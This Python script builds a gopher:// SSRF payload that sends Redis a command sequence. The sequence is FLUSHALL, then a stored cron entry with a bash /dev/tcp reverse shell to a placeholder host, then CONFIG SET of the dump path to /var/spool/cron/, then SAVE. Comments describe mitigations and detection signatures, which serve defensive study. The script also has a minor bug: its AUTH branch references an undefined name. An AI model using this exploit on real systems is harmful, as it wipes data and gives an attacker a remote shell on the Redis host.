- import urllib.parse
# Settings and command list for a gopher:// URL that carries raw Redis commands.
#
# Defender reading of this block: the sequence only succeeds when (a) some
# URL fetcher on the victim side accepts the gopher scheme and can reach the
# Redis port, (b) Redis accepts CONFIG SET for `dir` / `dbfilename`, and
# (c) the Redis process can write into the cron spool directory.
# Mitigations: restrict URL fetchers to an http/https allowlist, keep Redis
# bound to trusted interfaces with `protected-mode` and `requirepass`/ACLs,
# restrict CONFIG via ACLs or `rename-command` (Redis 7+ also blocks runtime
# changes to `dir`/`dbfilename` unless `enable-protected-configs` is turned
# on), and run Redis as an unprivileged user with no write access to cron paths.
# Detection: FLUSHALL followed by CONFIG SET dir/dbfilename and SAVE from an
# unexpected client, and a new file under the cron spool that starts with the
# RDB "REDIS" magic bytes.

# Placeholders for the callback endpoint embedded in the cron line below.
reverse_host = "<YOUR_REVERSE_HOST>"
reverse_port = "<YOUR_REVERSE_PORT>"
# URL scheme and placeholders for the Redis endpoint.
protocol = "gopher://"
ip = "<REDIS_HOST>"
port = "<REDIS_PORT>"
# Value stored in Redis: a once-a-minute cron entry wrapped in blank lines
# (presumably so cron can still parse it inside the binary dump file).
shell = "\n\n*/1 * * * * bash -i >& /dev/tcp/{}/{} 0>&1\n\n".format(reverse_host, reverse_port)
# Directory and file name that Redis is told to use for its dump file.
path = "/var/spool/cron/"
filename = "<REDIS_SERVICE_USER>"
# Empty by default, so the AUTH branch below is skipped.
passwd = ""
cmds = [
    # Removes every key from the instance; sudden data loss is itself an indicator.
    "flushall",
    # Spaces inside the value are swapped for "${IFS}" so that cmd2redis,
    # which splits on spaces, keeps the value as a single token.
    "set 1 {}".format(shell.replace(" ","${IFS}")),
    "config set dir {}".format(path),
    "config set dbfilename {}".format(filename),
    # Writes the dataset to <dir>/<dbfilename>.
    "save",
    'quit'
]
# Only runs when passwd is non-empty.
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
# URL prefix: scheme, host, port and "/_"; the encoded commands are appended
# to it in the __main__ section.
payload = "{}{}:{}/_".format(protocol, ip, port)
def cmd2redis(arr):
    """Encode a space-separated command line as a Redis protocol array.

    The input is split on single spaces. Inside each resulting token the
    marker "${IFS}" is turned back into a space, so callers can protect
    embedded spaces from the split. The result is "*<count>" followed, for
    each token, by "$<length>" and the token itself, every element terminated
    by CRLF. The length is the token's character count after the marker has
    been replaced.

    Args:
        arr: Command and arguments as one string, separated by single spaces.

    Returns:
        The serialized command as a str.
    """
    crlf = "\r\n"
    # Restore protected spaces once per token instead of twice.
    words = [piece.replace("${IFS}", " ") for piece in arr.split(" ")]
    frame = ["*" + str(len(words))]
    for word in words:
        frame.append("$" + str(len(word)))
        frame.append(word)
    # Every element, including the last one, ends with CRLF.
    return crlf.join(frame) + crlf
if __name__ == "__main__":
    # Prints each serialized command between two 100-character rules, then the
    # finished URL: the prefix plus every command percent-encoded.
    # For defenders, that URL shape is the signature to look for in proxy and
    # application logs: a gopher scheme whose path holds percent-encoded CRLF
    # (%0D%0A) sequences aimed at a Redis port. URL fetchers that only accept
    # http/https never deliver it.
    rule = "=" * 100
    print(rule)
    for cmd in cmds:
        frame = cmd2redis(cmd)
        print(frame)
        payload += urllib.parse.quote(frame)
    print(rule)
    print(payload)